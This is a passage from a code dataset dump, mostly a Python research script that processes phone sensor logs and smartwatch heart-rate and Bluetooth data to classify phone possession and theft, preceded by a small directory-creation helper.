rna\r\n\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/rna-transcription/4b70213776b64866b4b4be0dff167623.py","file_name":"4b70213776b64866b4b4be0dff167623.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"36885986612","text":"import sys\nimport os.path\nimport os\n'''\n该函数类似java中的 java file mkdirs()\n'''\ndef mkdir(path):\n # 去除首位空格\n path = path.strip()\n\n if os.path.isabs(path):\n isExists = os.path.exists(path)\n # 判断结果\n if not isExists:\n # 如果不存在则创建目录\n # 创建目录操作函数\n os.makedirs(path)\n return True\n else:\n # 获取当前Py文件所在路径\n currentPath = os.getcwd()\n # 去除尾部 \\ 符号\n path = currentPath + '/' + path.rstrip(\"\\\\|/\")\n os.makedirs(path)\n\n\n#############################################################\n# main 方法\n############################################################\nif __name__ == '__main__':\n # 定义要创建的目录\n path = 'E:/pythontest/python_gdal_testdata/shp/'\n path = 'testdata/testdir/'\n # 调用函数\n mkdir(path)","repo_name":"ghsourcecode/rastershp_gdal_python","sub_path":"util/makedirs.py","file_name":"makedirs.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20650747035","text":"import csv\nimport os\nimport glob\nimport re\nimport datetime\nimport sys\nimport shutil\nimport argparse\nimport time as TIMER\n# import matplotlib.pyplot as plt\n# from matplotlib.dates import SecondLocator, MinuteLocator, HourLocator, DateFormatter, date2num\n# import classifier\nimport Sensors as sensors\nimport Classifiers as classifiers \nimport PossessionState\nimport pickle\nimport argparse\nimport traceback\nimport math\n\nfrom configsettings import *\nfrom collections import deque, Counter, OrderedDict\nfrom UnlockTimeChecker import computeUnlocks\n\nDUMP_RESULTS = True\n\nif DIRECTORY[-1] != '/':\n DIRECTORY += '/'\n\nNOW = datetime.datetime.now()\n# NOW_DAY = NOW.strftime('%Y_%m_%d')\n\nYESTERDAY = (NOW - datetime.timedelta(days=1)).strftime('%Y_%m_%d')\n# NOW_DAY = YESTERDAY\nNOW_DAY = '2016_11_01'\n\n# RELEVANT_SENSORS = set([])\n# RELEVANT_SENSORS = [sensors.ACCELEROMETER, sensors.PHONE_ACTIVE_SENSORS]\nRELEVANT_SENSORS = [sensors.ACCELEROMETER, sensors.PHONE_ACTIVE_SENSORS, sensors.LIGHT_SENSOR]\nHEARTRATE_SENSOR = sensors.HEART_RATE\n# BLUETOOTH_SENSOR = sensors.BLUETOOTH_CONNECTED\n# WATCH_SENSORS = [HEARTRATE_SENSOR, BLUETOOTH_SENSOR]\nWATCH_SENSORS = [HEARTRATE_SENSOR, sensors.CONNECTED_DEVICES]\nYEAR_2000 = datetime.date(2000, 1, 1)\n\nBOOT_TIME_DELTA = datetime.timedelta(hours=1)\nBOOT_TIME_SENSOR = sensors.ACCELEROMETER\nSTART_OF_TIME = datetime.datetime.min\n\nSANITY_TEST = False\nmaxWindowSize = 100\n\n# START_TIME_FILTER = datetime.time(hour=8)\n# END_TIME_FILTER = datetime.time(hour=22)\nRESULTS_DIRECTORY = './' + 'RESULTS/' + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M')\nSTART_TIME_FILTER = None\nEND_TIME_FILTER = None\n\n# SAFE_PERIOD = 3\n\nSAFE_PERIOD = 3\nUSE_CACHED_DATA = False\n\ndef getUserFilesByDayAndInstrument(userID, instrument):\n query = DIRECTORY + 'AppMon_' + userID + '*_' + instrument + '_' + '*'\n userFiles = glob.glob(query)\n userFiles.sort()\n # TODO: Need to filter for sensors that need data files with matching times as other\n # sensors (e.g. accelerometer and step count for Theft Classifier)\n # print(userFiles)\n return userFiles\n\n\ndef dataFilesToDataList(userFiles, bootTimes, needsToComputeBootTime=False):\n dataList = []\n currentBootTime = START_OF_TIME\n nextFileTime = START_OF_TIME\n nextFileTimeIndex = 0\n\n # print(\"USER FILES\")\n # print(userFiles)\n \n for dataFile in userFiles:\n with open(dataFile) as f: \n reader = csv.reader(f)\n \n fileTime = timeStringToDateTime(getTimeFromFile(dataFile))\n\n firstRow = next(reader)\n firstTime = datetime.timedelta(milliseconds=int(firstRow[0]))\n\n if needsToComputeBootTime:\n bootTime = fileTime - firstTime\n\n difference = bootTime - currentBootTime if bootTime > currentBootTime else currentBootTime - bootTime\n\n if difference > BOOT_TIME_DELTA:\n currentBootTime = bootTime \n bootTimes.append((fileTime, bootTime))\n \n else:\n # print(\"FileTime\", str(fileTime))\n # print(\"NextFileTIme\", str(nextFileTime))\n if fileTime > nextFileTime:\n currentBootTime = bootTimes[nextFileTimeIndex][1] # boot time has changed, update\n # print(\"Current Boot Time:\", currentBootTime)\n nextFileTimeIndex = nextFileTimeIndex + 1 if nextFileTimeIndex < len(bootTimes) - 1 else nextFileTimeIndex\n nextFileTime = bootTimes[nextFileTimeIndex][0]\n\n firstRow[0] = convertToDateTime(firstRow[0], currentBootTime)\n minLength = len(firstRow)\n if len(firstRow) >= 2:\n if (START_TIME_FILTER == None or firstRow[0].time() >= START_TIME_FILTER) and (END_TIME_FILTER == None or firstRow[0].time() < END_TIME_FILTER):\n dataList.append(firstRow)\n count = 1\n for row in reader:\n if len(row) >= 2 and len(row) >= minLength:\n row[0] = convertToDateTime(row[0], currentBootTime)\n if (START_TIME_FILTER == None or firstRow[0].time() >= START_TIME_FILTER):\n if (END_TIME_FILTER == None or firstRow[0].time() < END_TIME_FILTER):\n dataList.append(row)\n else:\n return dataList\n\n if SANITY_TEST:\n count += 1\n if count > 10000:\n break\n # print(\"DATA LIST\")\n # print(len(dataList))\n return dataList\n\ndef dataFilesToDataListAbsTime(userFiles):\n dataList = []\n for dataFile in userFiles:\n with open(dataFile) as f:\n reader = csv.reader(f)\n for row in reader:\n if len(row) > 1:\n timestamp = int(row[1]) / 1000\n row[0] = datetime.datetime.fromtimestamp(timestamp)\n if (START_TIME_FILTER == None or row[0].time() >= START_TIME_FILTER):\n if (END_TIME_FILTER == None or row[0].time() < END_TIME_FILTER):\n dataList.append(row)\n # print \"Number of heartrate files\"\n # print len(dataList)\n return dataList\n\ndef getReferenceBootTimes(userID):\n userFiles = getUserFilesByDayAndInstrument(userID, BOOT_TIME_SENSOR)\n\n bootTimes = []\n currentBootTime = START_OF_TIME\n \n for dataFile in userFiles:\n with open(dataFile) as f: \n reader = csv.reader(f)\n \n fileTime = timeStringToDateTime(getTimeFromFile(dataFile))\n\n firstRow = reader.next()\n firstTime = datetime.timedelta(milliseconds=int(firstRow[0]))\n\n bootTime = fileTime - firstTime\n\n difference = bootTime - currentBootTime if bootTime > currentBootTime else currentBootTime - bootTime\n\n if difference > BOOT_TIME_DELTA:\n currentBootTime = bootTime \n bootTimes.append((fileTime, bootTime))\n\n return bootTimes\n\n\n\ndef getRelevantUserData(userID, logInfo=False, logFile=None):\n userData = {}\n bootTimes = []\n\n dataFiles = getUserFilesByDayAndInstrument(userID, BOOT_TIME_SENSOR)\n userData[BOOT_TIME_SENSOR] = dataFilesToDataList(dataFiles, bootTimes, True)\n\n for instrument in RELEVANT_SENSORS:\n if instrument != BOOT_TIME_SENSOR and instrument != sensors.PHONE_ACTIVE_SENSORS:\n \n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n userData[instrument] = dataFilesToDataList(dataFiles, bootTimes)\n \n #print(len(userData[sensors.ACCELEROMETER]))\n userData[sensors.PHONE_ACTIVE_SENSORS], userData[sensors.KEYGUARD] = processPhoneActiveData(userID, userData[sensors.ACCELEROMETER])\n print(\"KEYGUARD\", len(userData[sensors.KEYGUARD]))\n\n # print(\"GONNA TRY TO GET LIGHT SENSOR DATA\")\n userData[sensors.LIGHT_SENSOR] = processLightSensorData(userData)\n userData[BOOT_TIME_SENSOR] = userData[BOOT_TIME_SENSOR][:-1]\n print(\"Length accel:\", len(userData[BOOT_TIME_SENSOR]))\n print(\"Length active:\", len(userData[sensors.PHONE_ACTIVE_SENSORS]))\n\n for instrument in WATCH_SENSORS:\n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n # print \"Heart Rate Files\"\n # print dataFiles\n userData[instrument] = dataFilesToDataListAbsTime(dataFiles)\n\n if logInfo:\n logFile.write(\"Data Files Analyzed:\\n\")\n for filename in dataFiles:\n logFile.write(getTimeFromFile(filename) + \"_.csv\" + '\\n')\n logFile.write(\"Boot Times Computed:\\n\")\n for bootTime in bootTimes:\n logFile.write(\"Files after \" + str(formatTime(bootTime[0], withDate=True)) + \", have boot time: \" + str(formatTime(bootTime[1], withDate=True)) + '\\n')\n\n return userData\n\ndef processLightSensorData(userData):\n \n dataAccel = userData[sensors.ACCELEROMETER]\n if len(dataAccel) <= 1:\n return []\n dataLight = userData[sensors.LIGHT_SENSOR]\n dataLightProcessed = []\n firstAccelTime = dataAccel[0][0]\n \n firstLightTime = None\n firstLightValue = None\n\n currentLightIndex = -1\n startLightIndex = -1\n accelIndex = 0\n if len(dataLight) <= 1:\n return\n\n currentLightIndex = 0\n currentTime = dataLight[currentLightIndex][0]\n prevLightValue = None\n while currentTime < firstAccelTime: \n currentLightIndex += 1\n if currentLightIndex >= len(dataLight):\n break\n currentTime = dataLight[currentLightIndex][0]\n prevLightValue = dataLight[currentLightIndex][1]\n\n startLightIndex = currentLightIndex\n firstLightTime = dataLight[currentLightIndex][0]\n firstLightValue = dataLight[currentLightIndex][1] if prevLightValue == None else prevLightValue\n\n # print(\"GOT OUT OF FIRST WHILE\")\n currentAccelTime = dataAccel[accelIndex][0]\n while currentAccelTime < firstLightTime:\n lightRow = [currentAccelTime, firstLightValue]\n dataLightProcessed.append(lightRow)\n accelIndex += 1\n currentAccelTime = dataAccel[accelIndex][0]\n\n\n currentLightDate = dataLight[currentLightIndex][0]\n nextLightDate = dataLight[currentLightIndex + 1][0]\n\n # print(\"NOW ADDING DATA\")\n for i in range(accelIndex, len(dataAccel) - 1):\n accelRow = dataAccel[i]\n accelRowNext = dataAccel[i + 1]\n \n accelDate = accelRow[0]\n accelDateNext = accelRowNext[0]\n \n currentLightVal = dataLight[currentLightIndex][1]\n\n if accelDate >= nextLightDate:\n if currentLightIndex + 1 < len(dataLight):\n currentLightIndex += 1\n currentLightDate = dataLight[currentLightIndex][0]\n if currentLightIndex + 1 < len(dataLight):\n nextLightDate = dataLight[currentLightIndex + 1][0]\n \n lightRow = [accelDate, currentLightVal]\n dataLightProcessed.append(lightRow)\n \n else:\n lightRow = [accelDate, currentLightVal]\n dataLightProcessed.append(lightRow)\n\n return dataLightProcessed\n\ndef continuousWatchInterals(userID, userData={}):\n if len(userData) == 0:\n for instrument in WATCH_SENSORS:\n dataFiles = getUserFilesByDayAndInstrument(userID, instrument)\n # print \"Heart Rate Files\"\n # print dataFiles\n userData[instrument] = dataFilesToDataListAbsTime(dataFiles)\n watchData = userData\n delta = datetime.timedelta(seconds=60)\n allIntervals = {}\n\n for instrument in WATCH_SENSORS:\n startTime = -1\n prevTime = -1\n intervals = []\n prevState = -1\n watchTimes = watchData[instrument]\n\n for row in watchTimes:\n time = row[0]\n state = row[-1]\n if startTime == -1:\n startTime = time\n elif time - prevTime > delta or prevState != state:\n intervals.append((startTime, prevTime, prevState))\n startTime = time\n prevState = state\n prevTime = time\n\n if prevTime != -1 and startTime != -1 and prevTime != -1:\n intervals.append((startTime, prevTime, prevState))\n allIntervals[instrument] = intervals \n return allIntervals\n\n# returns interval and state (1 = phone is near, 0, phone is not near, -1 unknown state)\ndef stateFromWatchData(allIntervals, file):\n i = 0\n j = 0\n bluetoothIntervals = allIntervals[sensors.CONNECTED_DEVICES]\n heartRateIntervals = allIntervals[HEARTRATE_SENSOR]\n states = [\"phoneNear\", \"phoneFar\", \"unknown\"]\n allIntervals = []\n for h in heartRateIntervals:\n start, end, state = h\n allIntervals.append((start, end, \"phoneNear\"))\n basisPeakIntervals = []\n for b in bluetoothIntervals:\n start, end, state = b\n if str(state) == \"Basis Peak\":\n basisPeakIntervals.append((start, end))\n noHeartIntervals = []\n prevTime = -1\n for start, end, state in heartRateIntervals:\n if prevTime == -1:\n prevTime = end\n elif start > prevTime:\n noHeartIntervals.append((prevTime, start))\n prevTime = end\n\n while i < len(noHeartIntervals) and j < len(basisPeakIntervals):\n hInterval = noHeartIntervals[i]\n bInterval = basisPeakIntervals[j]\n hStart, hEnd = hInterval\n bStart, bEnd = bInterval\n\n if hEnd < bStart:\n allIntervals.append((hStart, hEnd, \"phoneFar\"))\n i += 1\n elif bEnd < hStart:\n j += 1\n elif hStart < bStart:\n allIntervals.append((hStart, bStart, \"phoneFar\"))\n if bEnd < hEnd:\n allIntervals.append((bStart, bEnd, \"unknown\"))\n j += 1\n noHeartIntervals[i] = (bEnd, hEnd)\n else: \n allIntervals.append((bStart, hEnd, \"unknown\"))\n i += 1\n basisPeakIntervals[j] = (hEnd, bEnd)\n else:\n bStart = hStart\n if hEnd < bEnd:\n allIntervals.append((bStart, hEnd, \"unknown\"))\n i += 1\n basisPeakIntervals[j] = (hEnd, bEnd)\n else:\n allIntervals.append((bStart, bEnd, \"unknown\"))\n j += 1 \n noHeartIntervals[i] = (bEnd, hEnd)\n\n while i < len(noHeartIntervals):\n hInterval = noHeartIntervals[i]\n hStart, hEnd = hInterval\n allIntervals.append((hStart, hEnd, \"phoneFar\"))\n i += 1\n\n allIntervals = sorted(allIntervals, key=lambda x: x[0])\n logString = \"\"\n result = {}\n for start, end, state in allIntervals:\n if state not in result:\n result[state] = [(start, end)]\n else:\n result[state].append((start, end))\n logString += state + \" : (\" + str(start) + \", \" + str(end) + \")\"\n logString += \"\\n\"\n file.write(logString)\n return result, allIntervals\n\ndef watchActivationStates(watchStates):\n activated = []\n deactivated = []\n delta = datetime.timedelta(minutes=3)\n for start, end, state in watchStates:\n if state == \"phoneNear\":\n activated.append((start, end))\n else:\n if end - start > delta:\n deactivated.append((start, end))\n else:\n activated.append((start, end))\n # if \"phoneNear\" in watchStates:\n # activated = watchStates[\"phoneNear\"]\n # if \"unknown\" in watchStates:\n # deactivated += watchStates[\"unknown\"]\n # if \"phoneFar\" in watchStates:\n # deactivated += watchStates[\"phoneFar\"]\n \n activated = sorted(activated, key=lambda x: x[0])\n deactivated = sorted(deactivated, key=lambda x: x[0])\n # print(\"DEACTIVATED WATCH:\", deactivated)\n mergeAdjacentIntervals(deactivated)\n mergeAdjacentIntervals(activated)\n return activated, deactivated\n\n\n\ndef processPhoneActiveData(ID, posDataAccel):\n if len(posDataAccel) <= 1:\n return []\n\n firstAccelTime = posDataAccel[0][0]\n \n posFilesTouch = getUserFilesByDayAndInstrument(ID, 'TouchScreenAsEvent')\n rawPosDataTouch = dataFilesToDataListAbsTime(posFilesTouch)\n # # print(\"RAW DATA TOUCH\")\n # # print(rawPosDataTouch)\n \n posFilesScreen = getUserFilesByDayAndInstrument(ID, 'TriggeredScreenState')\n rawPosDataScreen = dataFilesToDataListAbsTime(posFilesScreen)\n \n posFilesLocked = getUserFilesByDayAndInstrument(ID, 'TriggeredKeyguard')\n rawPosDataLocked = dataFilesToDataListAbsTime(posFilesLocked)\n\n\n\n currScreenDate = None\n nextScreenDate = None\n currScreenVal = None\n currLockedDate = None\n nextLockedDate = None\n currLockedVal = None\n \n touchIndex = -1\n if len(rawPosDataTouch) > 0:\n\n touchIndex = 0\n currentTime = rawPosDataTouch[touchIndex][0]\n while currentTime < firstAccelTime: \n touchIndex += 1\n if touchIndex >= len(rawPosDataTouch):\n break\n currentTime = rawPosDataTouch[touchIndex][0]\n\n startTouchIndex = touchIndex\n \n screenIndex = -1\n if len(rawPosDataScreen) > 0:\n screenIndex = 0\n currentTime = rawPosDataScreen[screenIndex][0]\n while currentTime < firstAccelTime:\n screenIndex += 1\n if screenIndex >= len(rawPosDataScreen):\n break\n currentTime = rawPosDataScreen[screenIndex][0]\n # # print(currentTime)\n # # print(screenIndex)\n currScreenDate = rawPosDataScreen[screenIndex][0]\n currScreenVal = rawPosDataScreen[screenIndex][2]\n if len(rawPosDataScreen) > 1:\n nextScreenDate = rawPosDataScreen[screenIndex + 1][0]\n \n lockedIndex = -1\n if len(rawPosDataLocked) > 0:\n lockedIndex = 0\n currentTime = rawPosDataLocked[lockedIndex][0]\n while currentTime < firstAccelTime:\n lockedIndex += 1\n if lockedIndex >= len(rawPosDataLocked):\n break\n currentTime = rawPosDataLocked[lockedIndex][0]\n currLockedDate = rawPosDataLocked[lockedIndex][0]\n currLockedVal = rawPosDataLocked[lockedIndex][2]\n if len(rawPosDataLocked) > 1:\n nextLockedDate = rawPosDataLocked[lockedIndex + 1][0]\n \n posDataTouch = []\n posDataScreen = []\n posDataLocked = []\n \n # # print(firstAccelTime)\n # # print(screenIndex)\n \n truthToNum = lambda x : 0 if str(x) == 'false' else 1\n \n for i in range(len(posDataAccel) - 1):\n accelRow = posDataAccel[i]\n accelRowNext = posDataAccel[i + 1]\n \n accelDate = accelRow[0]\n accelDateNext = accelRowNext[0]\n \n # Calculate number of touch events starting at this row time and before next row time\n # touchDate >= firstAccelTime\n if len(rawPosDataTouch) == 0 or touchIndex >= len(rawPosDataTouch) or rawPosDataTouch[touchIndex][0] >= accelDateNext: # No touch events\n touchRow = [accelDate, 0]\n posDataTouch.append(touchRow)\n ## print(\"TOUCH DATE:\" + str(touchDate))\n ## print(\"ACCEL DATE:\" + str(accelDate))\n \n else: #touchDate < AccelDateNext\n numTouches = 0\n touchDate = rawPosDataTouch[touchIndex][0]\n while touchDate < accelDateNext and touchIndex < len(rawPosDataTouch):\n # # print(\"TOUCH RECOGNIZED!\")\n numTouches += 1\n touchIndex += 1\n if touchIndex < len(rawPosDataTouch) - 1:\n touchDate = rawPosDataTouch[touchIndex][0]\n \n touchRow = [accelDate, numTouches]\n posDataTouch.append(touchRow)\n \n \n # Calculate if screen on in this interval\n if currScreenDate == None or nextScreenDate == None:\n screenRow = [accelDate, 0]\n posDataScreen.append(screenRow)\n\n elif accelDate >= nextScreenDate:\n if screenIndex + 1 < len(rawPosDataScreen):\n screenIndex += 1\n currScreenDate = rawPosDataScreen[screenIndex][0]\n currScreenVal = rawPosDataScreen[screenIndex][2]\n if screenIndex + 1 < len(rawPosDataScreen):\n nextScreenDate = rawPosDataScreen[screenIndex + 1][0]\n \n screenRow = [accelDate, truthToNum(currScreenVal)]\n posDataScreen.append(screenRow)\n \n else:\n screenRow = [accelDate, truthToNum(currScreenVal)]\n posDataScreen.append(screenRow)\n \n # Calculate if locked on in this interval\n\n if currLockedDate == None or nextLockedDate == None:\n screenRow = [accelDate, 0]\n posDataLocked.append(screenRow)\n elif accelDate >= nextLockedDate:\n if lockedIndex + 1 < len(rawPosDataLocked):\n lockedIndex += 1\n currLockedDate = rawPosDataLocked[lockedIndex][0]\n currLockedVal = rawPosDataLocked[lockedIndex][2]\n if lockedIndex + 1 < len(rawPosDataLocked):\n nextLockedDate = rawPosDataLocked[lockedIndex + 1][0]\n \n lockedRow = [accelDate, truthToNum(currLockedVal)]\n posDataLocked.append(lockedRow)\n \n else:\n lockedRow = [accelDate, truthToNum(currLockedVal)]\n posDataLocked.append(lockedRow)\n \n posData = []\n curAccelSignX = float(posDataAccel[0][1]) > 0\n curAccelSignY = float(posDataAccel[0][2]) > 0\n curAccelSignZ = float(posDataAccel[0][3]) > 0\n \n curSigns = [curAccelSignX, curAccelSignY, curAccelSignZ]\n \n signsChanged = lambda now, cur : [1 if now[i] != cur[i] else 0 for i in range(len(now))]\n for i in range(len(posDataAccel) - 1):\n try:\n accelSignX = float(posDataAccel[i][1]) > 0\n accelSignY = float(posDataAccel[i][2]) > 0\n accelSignZ = float(posDataAccel[i][3]) > 0\n \n newSigns = [accelSignX, accelSignY, accelSignZ]\n accelSigns = signsChanged(newSigns, curSigns)\n curSigns = newSigns\n \n \n numTouches = posDataTouch[i][1]\n screenState = posDataScreen[i][1]\n lockedState = posDataLocked[i][1]\n \n row = [posDataAccel[i][0]] + [numTouches, screenState, lockedState] + accelSigns\n posData.append(row)\n\n except (ValueError,IndexError):\n print(\"BAD VALUE OF I:\", i)\n numTouches = posDataTouch[i][1]\n screenState = posDataScreen[i][1]\n lockedState = posDataLocked[i][1]\n \n row = [posDataAccel[i][0]] + [numTouches, screenState, lockedState] + signsChanged(curSigns, curSigns)\n posData.append(row)\n \n return posData, rawPosDataLocked\n\n\n\n\ndef runClassifier(classifier, userData):\n windowSize = classifier.getWindowTime()\n instruments = classifier.getRelevantSensors()\n \n # numRows = min([len(userData[instrument]) for instrument in instruments])\n # # print(len(userData[sensors.ACCELEROMETER]))\n\n classifications = []\n\n for i in range(maxWindowSize // windowSize):\n windowOfData = {}\n for instrument in instruments:\n start = i * windowSize\n end = (i + 1) * windowSize\n windowOfData[instrument] = userData[instrument][start:end]\n classification = classifier.classify(windowOfData)\n classifications.append(classification)\n \n return classifications\n\n# {windowStartTime : 0, 1}\n# {7:30pm : 0}\n\n# {0 : [list of times], 1 : [list of times]}\n\ndef getHeartRateTimes(userData):\n heartRateData = userData[HEARTRATE_SENSOR]\n intervals = []\n # # print \"Heart rate data\"\n # # print len(heartRateData)\n if len(heartRateData) <= 0:\n return intervals\n\n currentWindowStartTime = heartRateData[0][0]\n currentWindowEndTime = currentWindowStartTime\n THRESHOLD = datetime.timedelta(minutes=5)\n for row in heartRateData:\n time = row[0]\n if time - currentWindowEndTime > THRESHOLD:\n interval = (currentWindowStartTime, currentWindowEndTime)\n intervals.append(interval)\n currentWindowStartTime = time\n currentWindowEndTime = time\n else:\n currentWindowEndTime = time\n interval = (currentWindowStartTime, currentWindowEndTime)\n intervals.append(interval)\n\n return intervals\n\n\n\ndef runClassifiersOnUser(userID, csvWriter, resultsFile, userData={}):\n if DUMP_RESULTS:\n resultsFile.write(\"###########################\\n\")\n resultsFile.write(str(userID) + '\\n')\n resultsFile.write(\"###########################\\n\")\n # print(userID)\n if len(userData) == 0:\n userData = getRelevantUserData(userID, logInfo=True, logFile=resultsFile)\n heartRateTimes = getHeartRateTimes(userData)\n\n csvRow = [userID]\n results = {}\n pickleResults = {}\n\n for instrument in RELEVANT_SENSORS:\n print(instrument, \":\", len(userData[instrument])) \n\n numRows = min([len(userData[instrument]) for instrument in RELEVANT_SENSORS])\n\n classifications = []\n intervalsByClass = {}\n SMOOTHING_NUM = 10\n resultsBuffer = deque()\n resultsCounter = Counter()\n currentClass = -1\n firstTime = userData[sensors.ACCELEROMETER][0][0]\n currentInterval = (firstTime, firstTime)\n\n for c in classifiers.CLASSIFIERS:\n # print(c)\n intervalsByClass[c] = []\n intervalsByClass[\"Unknown\"] = []\n\n limit = numRows // maxWindowSize * maxWindowSize\n # print(\"LIMIT\", limit)\n\n print(\"########\")\n print(\"SAFE PERIOD:\", SAFE_PERIOD)\n possessionState = PossessionState.PossessionState(userData, userData[sensors.PHONE_ACTIVE_SENSORS], userData[sensors.KEYGUARD], SMOOTHING_NUM, safe_period=SAFE_PERIOD)\n aggregateClassifierResults = []\n for i in range(0, limit, maxWindowSize):\n windowOfData = {}\n windowStartTime = 0\n for instrument in RELEVANT_SENSORS:\n data = userData[instrument][i:i + maxWindowSize] \n windowOfData[instrument] = data\n windowStartTime = getWindowStartTime(data)\n \n if i % 50000 == 0:\n print(\"i:\", i)\n print(\"NumRows:\", numRows)\n classifierResults = {}\n for c in classifiers.CLASSIFIERS:\n # aggregateClassifierResults[c].append(((windowStartTime, windowStartTime + datetime.timedelta(seconds=1)), results))\n classifier = classifiers.CLASSIFIERS[c]\n results = runClassifier(classifier, windowOfData)\n classifierResults[classifier] = results\n # if i % 50000 == 0 and c ==classifiers.HAND_CLASSIFIER:\n # print(\"TYPE: \", type(results))\n\n\n logString = windowStartTime.strftime(\"%H:%M:%S\") + \"| \" \n aggregateWindow = {}\n for c in classifierResults:\n aggregateWindow[c.getName()] = classifierResults[c]\n aggregateClassifierResults.append(((windowStartTime, windowStartTime + datetime.timedelta(seconds = 1)), aggregateWindow))\n windowClassification = classifierPolicy(classifierResults)\n logString += \"___\" + windowClassification[0] + \"___ \" \n for c, results in classifierResults.items():\n r = Counter()\n for result in results:\n r[result] += 1\n r = dict(r)\n logString += '\"' + c.getName()[0] + '\"' + \":\" + str(r) + \"; \"\n logString += \"\\n\"\n resultsFile.write(logString)\n\n resultsBuffer.append((windowStartTime, windowClassification))\n resultsCounter[windowClassification] += 1\n # print(\"WINDOW START TIME:\", windowStartTime)\n if len(resultsBuffer) >= SMOOTHING_NUM:\n middleWindow = resultsBuffer[SMOOTHING_NUM // 2]\n middleWindowStartTime = middleWindow[0]\n # print(\"MIDDLE WINDOW START TIME:\", middleWindowStartTime)\n newClassification = resultsCounter.most_common(1)[0][0]\n \n possessionState.updateState(middleWindowStartTime, newClassification)\n if currentClass == -1:\n currentClass = newClassification\n # currentInterval = (middleWindowStartTime, middleWindowStartTime)\n elif currentClass != newClassification:\n classifications.append((currentInterval, currentClass))\n intervalsByClass[currentClass].append(currentInterval)\n interval = currentInterval\n currentInterval = (middleWindowStartTime, middleWindowStartTime)\n currentClass = newClassification\n else:\n currentInterval = (currentInterval[0], middleWindowStartTime)\n\n removed = resultsBuffer.popleft()\n removedClassification = removed[1]\n resultsCounter[removedClassification] -= 1\n\n\n classifications.append((currentInterval, currentClass))\n intervalsByClass[currentClass].append(currentInterval)\n\n return classifications, intervalsByClass, possessionState, aggregateClassifierResults\n\n\ndef logResultsToFile(classifierResults, classifier_name, resultsFile):\n resultsFile.write(\"-------------------------------------\\n\")\n resultsFile.write(str(classifier_name) + '\\n')\n resultsFile.write(\"-------------------------------------\\n\")\n resultIntervals, resultIntervalsByValue = classifierResults\n resultsFile.write(\"Result Intervals\\n\")\n for interval in resultIntervals:\n interval = (formatTimeInterval(interval[0], withDate=True), interval[1])\n resultsFile.write(str(interval) + '\\n')\n\n posTimes = resultIntervalsByValue[1]\n negTimes = resultIntervalsByValue[0]\n\n resultsFile.write(\"Positive Intervals\\n\")\n for interval in posTimes:\n resultsFile.write(formatTimeInterval(interval, withDate=True) + ' ; ' + formatTimeValue(intervalLength(interval)) + '\\n')\n\n resultsFile.write(\"Negative Intervals\\n\")\n for interval in negTimes:\n resultsFile.write(formatTimeInterval(interval, withDate=True) + ' ; ' + formatTimeValue(intervalLength(interval)) + '\\n')\n\n\n\ndef processTheftResults(results, writer, csvRow):\n resultIntervals, resultIntervalsByValue = results[0], results[1]\n\n posTimes = resultIntervalsByValue[1]\n negTimes = resultIntervalsByValue[0]\n numPos = len(posTimes)\n numNeg = len(negTimes)\n numTotal = numPos + numNeg\n\n posTimesString = \"No false positive periods\"\n longestPosIntervalString = \"No false positive periods\"\n\n if len(posTimes) > 0:\n posTimesString = intervalsToString(posTimes)\n longestPosInterval = posTimes[0]\n longestPosIntervalLength = intervalLength(posTimes[0])\n for interval in posTimes:\n length = intervalLength(interval)\n if length > longestPosIntervalLength:\n longestPosIntervalLength = length\n longestPosInterval = interval\n\n longestPosIntervalString = formatTimeInterval(longestPosInterval)\n\n csvRow += [longestPosIntervalString, posTimesString, str(numPos), str(numNeg), str(numTotal)] \n\ndef processResults(results, writer, csvRow):\n # analyze results\n # write actionable output to writer\n resultIntervals, resultIntervalsByValue = results[0], results[1]\n \n negativeIntervals = sorted(resultIntervalsByValue[0], key=intervalLength) \n positiveIntervals = sorted(resultIntervalsByValue[1], key=intervalLength)\n\n negStats = getIntervalStats(negativeIntervals)\n posStats = getIntervalStats(positiveIntervals)\n\n negTime = negStats[\"totalTimeSpent\"].total_seconds()\n posTime = posStats[\"totalTimeSpent\"].total_seconds()\n totalTime = negTime + posTime\n\n negTimePercentage = negTime / totalTime if totalTime > 0 else 0\n posTimePercentage = posTime / totalTime if totalTime > 0 else 0\n\n stats = [\"totalTimeSpent\", \"medianLength\", \"avgLength\", \"longestInterval\", \"shortestInterval\"]\n\n csvRow.append(posTimePercentage)\n for stat in stats:\n val = posStats[stat]\n csvRow.append(formatTimeValue(val))\n \n csvRow.append(negTimePercentage)\n for stat in stats:\n val = negStats[stat]\n csvRow.append(formatTimeValue(val))\n \n\ndef getIntervalStats(intervals):\n stats = {}\n intervalLengths = [intervalLength(interval) for interval in intervals]\n # print(intervalLengths)\n totalTimeSpent = datetime.timedelta(seconds=0)\n for interval in intervalLengths:\n if type(interval) is int:\n continue\n totalTimeSpent += interval\n\n medianLength = \"N/A\"\n avgLength = \"N/A\"\n longestInterval = \"N/A\"\n shortestInterval = \"N/A\"\n\n if totalTimeSpent.total_seconds() < 0:\n print(\"WTF!!!\")\n for interval in intervals:\n print(formatTimeInterval(interval))\n\n if len(intervals) > 0:\n medianLength = intervalLength(intervals[len(intervals) // 2])\n avgLength = totalTimeSpent / len(intervalLengths)\n longestInterval = intervals[-1]\n shortestInterval = intervals[0]\n\n\n stats[\"totalTimeSpent\"] = totalTimeSpent\n stats[\"medianLength\"] = medianLength\n stats[\"avgLength\"] = avgLength\n stats[\"longestInterval\"] = longestInterval\n stats[\"shortestInterval\"] = shortestInterval\n \n\n return stats\n\ndef getIntervalStatHeaders(classifier_name):\n headers = [\"% Time Positive\", \"Total Time Positive\", \"Median Period Length\", \"Average Period Length\",\n \"Longest Positive Period\", \"Shortest Positive Period\", \"% Time Negatve\", \"Total Time Negative\", \"Median Period Length\", \"Average Period Length\",\n \"Longest Negative Period\", \"Shortest Negative Period\",]\n\n classifier = \" (\" + classifier_name + \")\"\n return [header + classifier for header in headers]\n\n\n\ndef processAllClassifierResults(results, csvRow):\n conflicitingClassifications = findConflictingClassifications(results, False)\n # print \"These classifications conflict\"\n # print conflicitingClassifications\n if len(conflicitingClassifications) > 0:\n csvRow += [intervalsToString(conflicitingClassifications)]\n else:\n csvRow += [\"No times when multiple classifiers output 1\"]\n\n conflicitingClassificationsIncludingTheft 